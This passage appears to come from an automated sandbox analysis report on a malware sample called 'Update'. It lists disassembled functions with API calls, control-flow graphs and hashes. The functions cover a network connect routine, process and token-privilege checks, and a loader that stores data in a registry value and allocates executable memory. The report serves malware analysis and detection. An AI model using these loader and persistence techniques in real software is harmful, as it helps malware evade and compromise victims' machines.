                                                                                            • Instruction Fuzzy Hash: 28B2BC71D122688BEB24CF24CC947EDBBB2BF45304F158298D449ABB81DB755AC8CF91
                                                                                            Function 034E6EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateDXGIFactory.DXGI(0350579C,?,DF800B7B,74DEDF80,00000000,75BF73E0), ref: 034E6F4A
                                                                                            • swprintf.LIBCMT ref: 034E711E
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E71C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                            • API String ID: 3803070356-257307503
                                                                                            • Opcode ID: 3c4cf5d1d8e4a9ce5910e23ef197885465290b12b9a7cf4a703b4a32808fc16e
                                                                                            • Instruction ID: 60ca755caf5212d3ac6150471b0fb86490c112b3a2592722a4591b9d87e9d540
                                                                                            • Opcode Fuzzy Hash: 3c4cf5d1d8e4a9ce5910e23ef197885465290b12b9a7cf4a703b4a32808fc16e
                                                                                            • Instruction Fuzzy Hash: DBE16471E002259FDF24CE64CC80BEEB775AB85711F1846EED919AB384D730AE818F95
                                                                                            Function 6C382A4B Relevance: 15.0, APIs: 5, Strings: 3, Instructions: 998sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C381070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
                                                                                              • Part of subcall function 6C381070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
                                                                                            • Sleep.KERNEL32(000000C8), ref: 6C382B0D
                                                                                            • _strlen.LIBCMT ref: 6C382B53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFileIos_base_dtorSleep_strlenstd::ios_base::_
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 3921760320-2946808363
                                                                                            • Opcode ID: 09c1b4ea9dbfc4ce12f077609c7eccd2ac99e219521cca9d38d90f1da009a7b5
                                                                                            • Instruction ID: 1ea159107810157dc0c2a4a304e58bb139b9d80ffece11063982777bc967bcc3
                                                                                            • Opcode Fuzzy Hash: 09c1b4ea9dbfc4ce12f077609c7eccd2ac99e219521cca9d38d90f1da009a7b5
                                                                                            • Instruction Fuzzy Hash: 70A2DD71D122688BEB24CF64CC947EDBBB2BF45304F158298D449ABB81DB755AC8CF81
                                                                                            Function 6C382BC6 Relevance: 13.2, APIs: 3, Strings: 4, Instructions: 933COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$SPV$jIk
                                                                                            • API String ID: 4218353326-3917736278
                                                                                            • Opcode ID: 1df733039b8f4e012ba1f3da258fbc234ccc064faa6a51ef86ad5193c37a6de5
                                                                                            • Instruction ID: bdfa321856aa68332e5f667d3ed979e088daa8830fbff05261a1cce2630f4358
                                                                                            • Opcode Fuzzy Hash: 1df733039b8f4e012ba1f3da258fbc234ccc064faa6a51ef86ad5193c37a6de5
                                                                                            • Instruction Fuzzy Hash: 7592CD71D122688BEB24CF64C8947EDBBB2BF45304F158298D449ABB81DB755EC8CF81
                                                                                            Function 034E7410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,034E7523), ref: 034E743D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7444
                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E7452
                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E745A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                            • API String ID: 3433367815-192647395
                                                                                            • Opcode ID: 2addd24a9b22a879f5ac8dbbadf2ca829ffb49363a9cd7d7d94af806c6b56c85
                                                                                            • Instruction ID: f7e407f510249b0f8a1d0d57361e4c8c5d4b4d43880cb214548957f1b317d029
                                                                                            • Opcode Fuzzy Hash: 2addd24a9b22a879f5ac8dbbadf2ca829ffb49363a9cd7d7d94af806c6b56c85
                                                                                            • Instruction Fuzzy Hash: BB014F71D002099FCF50EFF4E944AAEBFF5EB08201F5449AAD559E7240E6768A00CF65
                                                                                            Function 034E6050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E607C
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 034E6088
                                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 034E60B9
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 034E610F
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 034E6116
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                            • String ID:
                                                                                            • API String ID: 2526126748-0
                                                                                            • Opcode ID: d3b5f5fb82ad442a57154405a4909d3b5573550a4de3047a80a1269ec7a9d46f
                                                                                            • Instruction ID: c1a8a5de57d647ee502e94d265c2e2eb2e25647ad5cda56ce7eba3dbf41a18cd
                                                                                            • Opcode Fuzzy Hash: d3b5f5fb82ad442a57154405a4909d3b5573550a4de3047a80a1269ec7a9d46f
                                                                                            • Instruction Fuzzy Hash: FA21FC316001249BDB20EF74DC59BEEB3B9EF24316F05469ADC199B2C0EB369B05C654
                                                                                            Function 034E3360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Time_memmovetime
                                                                                            • String ID:
                                                                                            • API String ID: 1463837790-0
                                                                                            • Opcode ID: 3f883db18596281f11663a316cf5be669539ab74b6528e19f735a6cf8c9abb32
                                                                                            • Instruction ID: ff8cf09f8af4066d75cea47da57d2f976dd6d6b5694e7d5ca78d7313f50d8bd9
                                                                                            • Opcode Fuzzy Hash: 3f883db18596281f11663a316cf5be669539ab74b6528e19f735a6cf8c9abb32
                                                                                            • Instruction Fuzzy Hash: C351B27A700201AFD712CF6AC8C0E6BF7A9BF4821571886AEE9198F704D731F851CB94
                                                                                            Function 100054C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 902 100054c0-100054d6 903 100054dc-100054e1 902->903 904 1000580e-10005813 902->904 905 10005707-1000575f VirtualAlloc call 1000c880 call 100067ff 903->905 906 100054e7-1000550f RegOpenKeyExW 903->906 923 10005761-100057a1 call 1000c880 RegCreateKeyW 905->923 924 100057dd-100057ec 905->924 907 10005515-10005538 RegQueryValueExW 906->907 908 100055ba-100055bf 906->908 911 1000553a-10005567 call 100067ff call 1000c800 RegQueryValueExW 907->911 912 100055ad-100055b7 RegCloseKey 907->912 910 100055c2-100055c8 908->910 915 100055e8-100055ea 910->915 916 100055ca-100055cd 910->916 937 10005569-100055a8 VirtualAlloc call 1000c880 911->937 938 100055aa 911->938 912->908 921 100055ed-100055ef 915->921 919 100055e4-100055e6 916->919 920 100055cf-100055d7 916->920 919->921 920->915 925 100055d9-100055e2 920->925 926 100055f5-100055fc 921->926 927 100056f8-10005702 921->927 939 100057a3-100057c4 RegDeleteValueW RegSetValueExW 923->939 940 100057ca-100057d5 RegCloseKey call 100072bb 923->940 930 100057ee-1000580b call 1000721b Sleep call 10002d10 924->930 925->910 925->919 931 10005611-100056d4 call 1000c800 * 3 call 100067ff call 1000c880 926->931 932 100055fe-1000560b VirtualFree 926->932 927->930 949 1000580d 930->949 956 100056e6-100056f5 call 1000680a 931->956 957 100056d6-100056e3 931->957 932->931 937->938 938->912 939->940 948 100057da 940->948 948->924 949->904 960 100056e4 call 100060df 957->960 961 100056e4 call 100031ef 957->961 960->956 961->956
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                                                                            • _memset.LIBCMT ref: 10005548
                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                                                                            • VirtualFree.KERNEL32(03040000,00000000,00008000), ref: 10005605
                                                                                            • _memset.LIBCMT ref: 10005669
                                                                                            • _memset.LIBCMT ref: 1000568D
                                                                                            • _memset.LIBCMT ref: 1000569F
                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100057CE
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                            • API String ID: 354323817-737951744
                                                                                            • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                            • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                                                                            • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                            • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51
                                                                                            Function 034E9E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1226 34e9e50-34e9e85 GdipGetImagePixelFormat 1227 34e9e8a-34e9eb1 1226->1227 1228 34e9e87 1226->1228 1229 34e9ec9-34e9ecf 1227->1229 1230 34e9eb3-34e9ec3 1227->1230 1228->1227 1231 34e9eeb-34e9f04 GdipGetImageHeight 1229->1231 1232 34e9ed1-34e9ee1 1229->1232 1230->1229 1233 34e9f09-34e9f2c GdipGetImageWidth 1231->1233 1234 34e9f06 1231->1234 1232->1231 1235 34e9f2e 1233->1235 1236 34e9f31-34e9f4e call 34e9c30 1233->1236 1234->1233 1235->1236 1239 34e9f54-34e9f68 1236->1239 1240 34ea055-34ea05a 1236->1240 1241 34e9f6e-34e9f87 GdipGetImagePaletteSize 1239->1241 1242 34ea0cf-34ea0d7 1239->1242 1243 34ea2a4-34ea2ba call 34ef00a 1240->1243 1247 34e9f8c-34e9f98 1241->1247 1248 34e9f89 1241->1248 1245 34ea0dd-34ea11a GdipBitmapLockBits 1242->1245 1246 34ea20a-34ea27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 1242->1246 1252 34ea11c-34ea121 1245->1252 1253 34ea14a-34ea177 1245->1253 1254 34ea281-34ea283 1246->1254 1249 34e9f9a-34e9fa5 call 34e9650 1247->1249 1250 34e9fb2-34e9fba 1247->1250 1248->1247 1249->1250 1273 34e9fa7-34e9fb0 call 34fc660 1249->1273 1258 34e9fbc-34e9fca call 34ef673 1250->1258 1259 34e9fd0-34e9fd5 call 34e1280 1250->1259 1260 34ea123 1252->1260 1261 34ea140-34ea145 1252->1261 1255 34ea1bf-34ea1de GdipBitmapUnlockBits 1253->1255 1256 34ea179-34ea18e call 34f07f2 1253->1256 1262 34ea285 1254->1262 1263 34ea2a2 1254->1263 1255->1254 1267 34ea1e4-34ea1e7 1255->1267 1278 34ea200-34ea205 call 34e1280 1256->1278 1279 34ea190-34ea197 1256->1279 1276 34e9fda-34e9fe5 1258->1276 1281 34e9fcc-34e9fce 1258->1281 1259->1276 1269 34ea12b-34ea13e call 34ef639 1260->1269 1261->1243 1264 34ea28d-34ea2a0 call 34ef639 1262->1264 1263->1243 1264->1263 1284 34ea287 1264->1284 1267->1254 1269->1261 1290 34ea125 1269->1290 1283 34e9fe7-34e9fe9 1273->1283 1276->1283 1278->1246 1279->1278 1285 34ea19e-34ea1bd 1279->1285 1286 34ea1ec-34ea1f1 call 34e1280 1279->1286 1287 34ea1f6-34ea1fb call 34e1280 1279->1287 1281->1283 1291 34e9feb-34e9fed 1283->1291 1292 34ea016-34ea030 GdipGetImagePalette 1283->1292 1284->1264 1285->1255 1285->1256 1286->1287 1287->1278 1290->1269 1293 34e9fef 1291->1293 1294 34ea00c-34ea011 1291->1294 1295 34ea03b-34ea040 1292->1295 1296 34ea032-34ea038 1292->1296 1299 34e9ff7-34ea00a call 34ef639 1293->1299 1294->1243 1300 34ea04a-34ea050 call 34ecca0 1295->1300 1301 34ea042-34ea048 1295->1301 1296->1295 1299->1294 1309 34e9ff1 1299->1309 1300->1240 1301->1300 1303 34ea05f-34ea063 1301->1303 1306 34ea065 1303->1306 1307 34ea0a0-34ea0c9 call 34e9d80 SetDIBColorTable call 34ea320 1303->1307 1310 34ea068-34ea098 1306->1310 1307->1242 1309->1299 1310->1310 1311 34ea09a 1310->1311 1311->1307
                                                                                            APIs
                                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9E7B
                                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9EFC
                                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9F24
                                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9F7F
                                                                                            • _malloc.LIBCMT ref: 034E9FC0
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034EA000
                                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 034EA028
                                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 034EA0B7
                                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 034EA112
                                                                                            • _free.LIBCMT ref: 034EA134
                                                                                            • _memcpy_s.LIBCMT ref: 034EA183
                                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 034EA1D0
                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03505A78,00022009,?,00000000,?,00000000), ref: 034EA22C
                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 034EA24C
                                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 034EA267
                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 034EA274
                                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 034EA27B
                                                                                            • _free.LIBCMT ref: 034EA296
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                            • String ID: &
                                                                                            • API String ID: 640422297-3042966939
                                                                                            • Opcode ID: 568ca693d89fef5fff2c6593fac74c86bd4a25f796c0abbb46885ed777dd9d3d
                                                                                            • Instruction ID: fbd34261c7d2621fd43996d527dfe9f583a6bbea983c09fc97674f11abc95840
                                                                                            • Opcode Fuzzy Hash: 568ca693d89fef5fff2c6593fac74c86bd4a25f796c0abbb46885ed777dd9d3d
                                                                                            • Instruction Fuzzy Hash: C5D164F1A002199FDB20DF55CC84B9AB7B4FF48305F0485AEE609AB351D734A985CF69
                                                                                            Function 034E2DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E2DBB
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E2DC7
                                                                                            • timeGetTime.WINMM ref: 034E2DCD
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 034E2DFA
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 034E2E26
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 034E2E32
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 034E2E51
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 034E2E5D
                                                                                            • gethostbyname.WS2_32(00000000), ref: 034E2E6B
                                                                                            • htons.WS2_32(?), ref: 034E2E8D
                                                                                            • connect.WS2_32(?,?,00000010), ref: 034E2EAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: d2527bfc698f6fe0659267c2a9ce8cfe84560e93cb5defd9cc29a9959abb46c6
                                                                                            • Instruction ID: c03d76af44b17f6dcb88389c5652f593725e500c493cb1ab721f911bff325094
                                                                                            • Opcode Fuzzy Hash: d2527bfc698f6fe0659267c2a9ce8cfe84560e93cb5defd9cc29a9959abb46c6
                                                                                            • Instruction Fuzzy Hash: 7D619071A40304AFE720EFA4DC45FABB7B8FF48B05F10491EF645AB2D0D6B1A9059B64
                                                                                            Function 10002D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 10002D9B
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                                                                            • timeGetTime.WINMM ref: 10002DAD
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                                                                            • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                                                                            • htons.WS2_32(?), ref: 10002E6D
                                                                                            • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                            • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
                                                                                            • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                            • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64
                                                                                            Function 034E6A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1359 34e6a70-34e6ae3 call 34eeff4 GetCurrentProcessId wsprintfW call 34e6910 call 34f6770 GetVersionExW 1366 34e6ae9-34e6af0 1359->1366 1367 34e6be6-34e6bec 1359->1367 1366->1367 1368 34e6af6-34e6afd 1366->1368 1369 34e6c14-34e6c21 wsprintfW 1367->1369 1368->1367 1370 34e6b03-34e6b21 GetCurrentProcess OpenProcessToken 1368->1370 1371 34e6c24-34e6c26 1369->1371 1370->1367 1372 34e6b27-34e6b47 GetTokenInformation 1370->1372 1373 34e6c28-34e6c2e call 34efac9 1371->1373 1374 34e6c31-34e6c46 call 34ef00a 1371->1374 1375 34e6bbb-34e6bce CloseHandle 1372->1375 1376 34e6b49-34e6b52 GetLastError 1372->1376 1373->1374 1381 34e6bf6-34e6bfc 1375->1381 1382 34e6bd0 1375->1382 1376->1375 1379 34e6b54-34e6b6b LocalAlloc 1376->1379 1379->1375 1386 34e6b6d-34e6b8d GetTokenInformation 1379->1386 1384 34e6c0e-34e6c0f 1381->1384 1385 34e6bfe-34e6c04 1381->1385 1387 34e6bee-34e6bf4 1382->1387 1388 34e6bd2-34e6bd4 1382->1388 1384->1369 1385->1371 1389 34e6c06-34e6c0c 1385->1389 1390 34e6bae-34e6bb5 LocalFree 1386->1390 1391 34e6b8f-34e6bac GetSidSubAuthorityCount GetSidSubAuthority 1386->1391 1387->1369 1388->1367 1392 34e6bd6-34e6bdc 1388->1392 1389->1369 1390->1375 1391->1390 1392->1371 1393 34e6bde-34e6be4 1392->1393 1393->1369
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 034E6A94
                                                                                            • wsprintfW.USER32 ref: 034E6AA7
                                                                                              • Part of subcall function 034E6910: GetCurrentProcessId.KERNEL32(DF800B7B,00000000,00000000,75BF73E0,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6938
                                                                                              • Part of subcall function 034E6910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6947
                                                                                              • Part of subcall function 034E6910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6960
                                                                                              • Part of subcall function 034E6910: CloseHandle.KERNEL32(00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E696B
                                                                                            • _memset.LIBCMT ref: 034E6AC2
                                                                                            • GetVersionExW.KERNEL32(?), ref: 034E6ADB
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 034E6B12
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 034E6B19
                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 034E6B3F
                                                                                            • GetLastError.KERNEL32 ref: 034E6B49
                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 034E6B5D
                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 034E6B85
